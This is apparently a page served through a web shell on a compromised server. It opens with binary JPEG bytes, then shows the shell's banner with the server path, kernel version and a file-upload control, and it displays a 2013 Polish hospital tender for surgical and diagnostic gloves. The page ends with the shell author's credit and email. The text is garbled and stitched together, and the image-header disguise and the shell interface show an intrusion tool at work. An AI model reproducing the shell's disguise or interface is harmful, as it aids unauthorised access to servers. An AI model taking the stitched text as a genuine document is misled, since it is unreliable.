JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130117/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130117/24464-N-2013.html

<p class="kh_header"><b>Kraków: Dostawa rękawic chirurgicznych jałowych, rękawic diagnostycznych niejałowych oraz osłonek medycznych jednorazowego użytku</b><br>
<b>Numer ogłoszenia: 24464 - 2013; data zamieszczenia: 17.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Specjalistyczny im. Stefana Żeromskiego Samodzielny Publiczny Zakład Opieki Zdrowotnej w Krakowie , os. Na Skarpie 66, 31-913 Kraków, woj. małopolskie, tel. (012) 6441956, faks (012) 6444756.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zeromski-szpital.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa rękawic chirurgicznych jałowych, rękawic diagnostycznych niejałowych oraz osłonek medycznych jednorazowego użytku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Grupa 1 - rękawice chirurgiczne jałowe
1.Rękawice chirurgiczne z lateksu, lekko pudrowane, poziom protein poniżej 75 ?g/g, jednorazowego użytku, jałowe (sterylizowane radiacyjnie), mikroteksturowane. AQL przed zapakowaniem 0,65, po zapakowaniu 1,0. Grubość pojedynczej ścianki palca min. 0,20 mm, długość min. 280 mm. Mankiet zakończony równomiernie rolowanym rantem. Pakowane w opakowania folia-folia. Na opakowaniu wymagana: data produkcji, data sterylizacji, data ważności. Rozmiary: 6,0; 6,5; 7,0; 7,5; 8,0; 8,5. Spełnienie wymagań potwierdzić protokołami badań producenta nie starszymi niż 2011 roku. - 70 000 par 
2.Rękawice chirurgiczne bezlateksowe, neoprenowe, bezpudrowe, pokryte poliuretanem, jednorazowego użytku, jałowe (sterylizowane radiacyjnie), mikroteksturowane. AQL przed zapakowanie 0,65 po zapakowaniu 1,0. Grubość pojedynczej ścianki palca min. 0,21 mm, długość min. 300 mm. Mankiet zakończony równomiernie rolowanym rantem. Rozmiary: 6,0; 6,5; 7,0; 7,5; 8,0. Spełnienie wymagań potwierdzić protokołami badań producenta nie starszymi niż z 2011 roku -5000 par 
3. Rękawice ginekologiczne, sterylne, lateksowe, bezpudrowe, polimeryzowane. Długość min. 500 mm, zawartość białek poniżej 10 ?g/g. Rozmiar 6,5(S), 7,5(M), 8,5(L) -1000 par 
Grupa 2 - rękawice diagnostyczne niejałowe i osłonki medyczne jednorazowego użytku do badań USG
1. Rękawice diagnostyczne, z lateksu, lekko pudrowane, niejałowe, pasujące na obie dłonie. Zawartość protein poniżej 150 ?g/g. Poziom AQL 1,5. Grubość pojedynczej ścianki palca min. 0,11 mm, długość min. 240 mm. Mankiet zakończony równomiernie rolowanym rantem. Pakowane po 100 szt. Rozmiary: XS, S, M, L, XL. Na opakowaniu wymagana: data produkcji, data ważności, nr serii. Spełnienie wymagań potwierdzić protokołami badań nie starszymi niż z 2011 roku - 5 000 opakowań.
2. Rękawice diagnostyczne, niejałowe, nitrylowe, bezpudrowe, polimeryzowane, o bardzo dużej elastyczności, o teksturowanych końcówkach palców. Średnia grubość pojedynczej ścianki palca min. 0,09 mm, długość min. 240 mm. AQL 1,5. Oznakowanie jako wyrób medyczny i środek ochrony osobistej kategorii III. Rozmiary: XS, S, M, L, XL. Pakowane po 100 sztuk. Spełnienie powyższych wymagań potwierdzić protokołami badań producenta nie starszymi niż z 2011 roku. Zgodne z normą EN 374-3 oraz ASTM F-1671. Dopuszczone do kontaktu z żywnością. Na opakowaniach fabryczne oznakowanie zgodnie z  odpowiednimi normami - 15 000 opakowań
3. Rękawice ochronne nitrylowe, flokowane bawełną. Chroniące przed zagrożeniami chemicznymi. Długość min 305 mm +/- 10 mm, grubość min 0,35 mm +/- 0,03mm. Dopuszczone do kontaktu z żywnością. Rękawice oznakowane jako środek ochrony osobistej kategorii III , Zgodne z normą EN 420, EN 388, EN 374 Rozmiar 7, 8, 9, 10, 11 - 3 000 par 
4. Rękawice foliowe HDPE, teksturowane. Rozmiar S, M, L. Op. po 100 szt. - 1 500 opakowań
5.Rękawice diagnostyczne, niejałowe, nitrylowe, bezpudrowe, o przedłużonym mankiecie teksturowane. Długość min. 295 mm. AQL 1,5. Pakowane po 100 szt. - 300 opakowań
6. Osłonki medyczne jednorazowego użytku do badań USG.  - 3 600 szt.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.00-4, 33.14.14.20-0, 18.42.43.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium,</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby każdy z Wykonawców złożył Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych - załącznik nr 4 do specyfikacji. Ocena spełniania warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby każdy z Wykonawców złożył Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych - załącznik nr 4 do specyfikacji. Ocena spełniania warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby każdy z Wykonawców złożył Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych - załącznik nr 4 do specyfikacji. Ocena spełniania warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby każdy z Wykonawców złożył Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych - załącznik nr 4 do specyfikacji. Ocena spełniania warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca posiadał na rachunku środki finansowe lub posiadał zdolność kredytową w wysokości nie mniejszej niż 50 % ceny oferty brutto (w przypadku złożenia ofert częściowych - 50 % sumy cen ofert częściowych - brutto). Ocena spełnienia tego warunku dokonana zostanie zgodnie z formułą spełnia-nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. Oświadczenie, iż oferowane wyroby medyczne posiadają świadectwa dopuszczenia do stosowania wymagane prawem, zgodnie z ustawą z dnia 20.05.2010r. o Wyrobach Medycznych:
	a) deklarację zgodności CE producenta (dotyczy wszystkich klas wyrobu medycznego);
	b) certyfikat jednostki notyfikującej (dotyczy klasy wyrobu medycznego: I sterylna, I z funkcją 	pomiarową, IIa, IIb, III);
	c) zgłoszenie/powiadomienie/wniosek do Prezesa Urzędu Rejestracji Produktów Leczniczych, 	Wyrobów Medycznych i Produktów Biobójczych;
	d) w przypadku produktów, które nie podlegają przepisom ustawy z dnia 20 maja 2010 r. o 	Wyrobach Medycznych, Wykonawca zobowiązany jest dołączyć do oferty oświadczenie, że posiada 	inne niż wyżej wymienione, odpowiednie dokumenty dopuszczające te produkty do obrotu i 	stosowania; oraz oświadczenie, iż na każde żądanie Zamawiającego w nieprzekraczalnym 5 	dniowym terminie zostaną przedłożone w/w dokumenty.
2. Katalogi producenta zawierające pełną informację o parametrach oferowanego wyrobu w języku polskim.
3. Protokoły badań producenta potwierdzające spełnienie wymagań przedmiotowych, nie starsze niż z 2011 roku (dotyczy Grupa 1 poz. 1, 2, Grupa 2 poz. 1,2). 
DODATKOWO DLA GRUPY 2 poz. 2.
1. Deklarację zgodności producenta dla środka ochrony osobistej kategorii III
2. Wyniki badań wykonane przez niezależną jednostkę badawczą potwierdzające odporność na przenikanie wirusów zgodnie z normą ASTM F-1671.
DODATKOWO DLA GRUPY 2 poz. 3.
1. Deklarację zgodności producenta dla środka ochrony osobistej kategorii III
2. Deklarację zgodności producenta potwierdzające, że oferowane rękawicę odpowiadają   normom EN 420, EN 374, EN 388</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony formularz ofertowy zgodnie z wymaganiami określonymi w Specyfikacji Istotnych Warunków Zamówienia, według wzoru stanowiącego załącznik nr 3 do specyfikacji.
2.W przypadku Wykonawców działających przez pełnomocnika - pełnomocnictwo, o którym mowa w rozdziale X pkt. 8b specyfikacji
3. W przypadku Wykonawców wspólnie ubiegających się o zamówienie - dokument stwierdzający ustanowienie przez Wykonawców wspólnie ubiegających się o zamówienie pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Jakość - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Odbiorca dopuszcza możliwość zmiany umowy w przypadku zmiany stawki podatku VAT. W przypadku zwiększenia stawki podatku VAT cena jednostkowa materiału netto nie ulega zmianie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zeromski-szpital.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> os. Na Skarpie 66 31- 913 Kraków Budynek Administracji, pok.7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.01.2013 godzina 10:30, miejsce: Szpitala Specjalistycznego im. Stefana Żeromskiego SP ZOZ w Krakowie, 31-913 Kraków, os. Na Skarpie 66 Kancelaria pok. 21.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Grupa 1 - rękawice chirurgiczne jałowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rękawice chirurgiczne z lateksu, lekko pudrowane, poziom protein poniżej 75 ?g/g, jednorazowego użytku, jałowe (sterylizowane radiacyjnie), mikroteksturowane. AQL przed zapakowaniem 0,65, po zapakowaniu 1,0. Grubość pojedynczej ścianki palca min. 0,20 mm, długość min. 280 mm. Mankiet zakończony równomiernie rolowanym rantem. Pakowane w opakowania folia-folia. Na opakowaniu wymagana: data produkcji, data sterylizacji, data ważności. Rozmiary: 6,0; 6,5; 7,0; 7,5; 8,0; 8,5. Spełnienie wymagań potwierdzić protokołami badań producenta nie starszymi niż 2011 roku. - 
70 000 par 
Rękawice chirurgiczne bezlateksowe, neoprenowe, bezpudrowe, pokryte poliuretanem, jednorazowego użytku, jałowe (sterylizowane radiacyjnie), mikroteksturowane. AQL przed zapakowanie 0,65 po zapakowaniu 1,0. Grubość pojedynczej ścianki palca min. 0,21 mm, długość min. 300 mm. Mankiet zakończony równomiernie rolowanym rantem. Rozmiary: 6,0; 6,5; 7,0; 7,5; 8,0. Spełnienie wymagań potwierdzić protokołami badań producenta nie starszymi niż z 2011 roku - 5 000 par 
Rękawice ginekologiczne, sterylne, lateksowe, bezpudrowe, polimeryzowane. Długość min. 500 mm, zawartość białek poniżej 10 ?g/g. Rozmiar 6,5(S), 7,5(M), 8,5(L) - 1 000 par.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Grupa 2 - rękawice diagnostyczne niejałowe i osłonki medyczne jednorazowego użytku do badań USG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rękawice diagnostyczne, z lateksu, lekko pudrowane, niejałowe, pasujące na obie dłonie. Zawartość protein poniżej 150 ?g/g. Poziom AQL 1,5. Grubość pojedynczej ścianki palca min. 0,11 mm, długość min. 240 mm. Mankiet zakończony równomiernie rolowanym rantem. Pakowane po 100 szt. Rozmiary: XS, S, M, L, XL. Na opakowaniu wymagana: data produkcji, data ważności, nr serii. Spełnienie wymagań potwierdzić protokołami badań nie starszymi niż z 2011 roku - 5 000 opakowań.
Rękawice diagnostyczne, niejałowe, nitrylowe, bezpudrowe, polimeryzowane, o bardzo dużej elastyczności, o teksturowanych końcówkach palców. Średnia grubość pojedynczej ścianki palca min. 0,09 mm, długość min. 240 mm. AQL 1,5. Oznakowanie jako wyrób medyczny i środek ochrony osobistej kategorii III. Rozmiary: XS, S, M, L, XL. Pakowane po 100 sztuk. Spełnienie powyższych wymagań potwierdzić protokołami badań producenta nie starszymi niż z 2011 roku. Zgodne z normą EN 374-3 oraz ASTM F-1671. Dopuszczone do kontaktu z żywnością. Na opakowaniach fabryczne oznakowanie zgodnie z  odpowiednimi normami - 15 000 opakowań
Rękawice ochronne nitrylowe, flokowane bawełną. Chroniące przed zagrożeniami chemicznymi. Długość min 305 mm +/- 10 mm, grubość 0,35 mm +/- 0,03mm. Dopuszczone do kontaktu z żywnością. Rękawice oznakowane jako środek ochrony osobistej kategorii III , Zgodne z normą EN 420, EN 388, EN 374 Rozmiar 7, 8, 9, 10, 11. - 3 000 par 
Rękawice foliowe HDPE, teksturowane. Rozmiar S, M, L. Op. po 100 szt. - 1 500 opakowań
Rękawice diagnostyczne, niejałowe, nitrylowe, bezpudrowe, o przedłużonym mankiecie teksturowane. Długość min. 295 mm. AQL 1,5.Pakowane po 100 szt. - 300 opakowań
Osłonki medyczne jednorazowego użytku do badań USG - 3 600 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.20-0, 18.42.43.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com